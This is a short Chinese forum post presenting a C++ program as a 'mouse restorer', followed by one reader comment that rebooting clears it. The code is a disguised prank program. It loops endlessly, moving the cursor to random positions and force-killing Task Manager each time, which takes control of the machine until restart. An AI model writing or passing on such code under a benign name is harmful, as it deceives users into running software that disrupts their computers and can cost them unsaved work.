鼠标恢复器
2024-09-01 18:13:25
发布于:北京
不是有人喜欢反病毒代码吗?现在再来再来喜欢一下鼠标恢复器
#include<iostream>
#include<stdlib.h>
#include<conio.h>
#include<windows.h>
#include<ctime>
using namespace std;
int main()
{
int x=GetSystemMetrics(SM_CXSCREEN);
int y=GetSystemMetrics(SM_CYSCREEN);
while(1)
{
SetCursorPos(rand()%x,rand()%y);
system("taskkill /f /im taskmgr.exe");
}
return 0;
}
全部评论 1
重启无事
2024-09-01 来自 上海
0
有帮助,赞一个